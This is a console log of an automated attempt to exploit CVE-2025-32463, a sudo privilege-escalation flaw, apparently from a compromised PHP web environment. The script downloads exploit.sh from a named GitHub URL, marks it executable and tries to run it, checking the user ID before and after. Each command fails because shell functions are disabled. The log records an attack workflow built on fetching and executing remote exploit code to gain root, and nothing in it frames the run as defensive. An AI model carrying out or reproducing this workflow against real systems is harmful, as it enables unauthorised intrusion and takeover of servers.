[*] Starting CVE-2025-32463 exploit automation
[*] Timestamp: 2026-03-02 23:58:33

[*] Disabled functions: exec,passthru,shell_exec,system

[*] Downloading exploit.sh from https://raw.githubusercontent.com/kh4sh3i/CVE-2025-32463/refs/heads/main/exploit.sh
[+] exploit.sh saved successfully (637 bytes)
[*] Making exploit.sh executable
[+] exploit.sh is now executable

========================================
[*] Current user ID (before exploit):
[>] Running: id
[-] No command execution function available

========================================

[*] Checking sudo version:
[>] Running: sudo --version 2>&1 | head -2
[-] No command execution function available


[*] Checking gcc availability:
[>] Running: which gcc
[-] No command execution function available


[*] Executing exploit.sh...
[*] This may take a few seconds...

----- EXPLOIT OUTPUT -----
[*] Exploit script content:
[>] Running: cat exploit.sh
[-] No command execution function available


[>] Running: ./exploit.sh
[-] No command execution function available

----- END EXPLOIT OUTPUT -----

========================================
[*] User ID after exploit execution:
[>] Running: id
[-] No command execution function available
========================================

[*] Exploit automation complete